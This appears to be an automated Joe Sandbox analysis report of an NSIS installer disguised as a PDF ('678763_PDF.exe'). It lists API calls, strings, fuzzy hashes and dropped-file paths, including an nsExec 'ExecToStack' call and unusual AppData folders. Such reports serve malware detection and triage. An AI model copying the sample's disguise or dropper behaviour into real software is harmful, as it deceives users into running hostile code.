Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\678763_PDF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-279532564
Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 004068B4

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
API String ID: 2295610775-3377814068
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\678763_PDF.exe",00008001), ref: 00403CAA
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEdit, xrefs: 00403E84
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E
RichEd20, xrefs: 00403E57
RichEd32, xrefs: 00403E65
: Completed, xrefs: 00403CF1, 00403CFA, 00403D08, 00403D57, 00403D5D
_Nb, xrefs: 00403DAD, 00403E15
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
.exe, xrefs: 00403D37
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00403CB9, 00403CC1, 00403D64, 00403D6A, 00403D7A
"C:\Users\user\Desktop\678763_PDF.exe", xrefs: 00403C2C
.DEFAULT\Control Panel\International, xrefs: 00403C95
RichEdit20W, xrefs: 00403E75, 00403E7B
1033, xrefs: 00403C49, 00403CA5

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\678763_PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-842240826
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\678763_PDF.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\678763_PDF.exe,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

C:\Users\user\Desktop\678763_PDF.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
soft, xrefs: 00403170
Inst, xrefs: 00403167
Error launching installer, xrefs: 004030D2
"C:\Users\user\Desktop\678763_PDF.exe", xrefs: 00403088
Null, xrefs: 00403179
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\678763_PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\678763_PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1744682579
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 0040675E
lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004067B8

Strings

antholite, xrefs: 004065B8
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
: Completed, xrefs: 004065C1, 0040667B, 00406682, 00406686, 0040669F, 004066A0, 004066B5, 004066CB, 004066FC, 00406728, 0040675D, 00406763, 00406780, 00406793, 004067B1, 004067B7, 004067C0, 004067F5

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
API String ID: 4024019347-2831730964
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

A, xrefs: 00403483
... %d%%, xrefs: 00403400
FB, xrefs: 004033A7, 004033C2, 0040343F
*B, xrefs: 004032E4
A, xrefs: 00403379

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ FB$ A$ A$... %d%%
API String ID: 551687249-3833040932
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll, xrefs: 0040183A, 00401856
ExecToStack, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 00401826, 00401844

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp$C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden$ExecToStack
API String ID: 1941528284-1904372047
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
SetWindowTextW.USER32(antholite,antholite), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

antholite, xrefs: 004055FD, 0040560D, 00405613, 00405636, 00405642

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: antholite
API String ID: 2531174081-3488562018
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

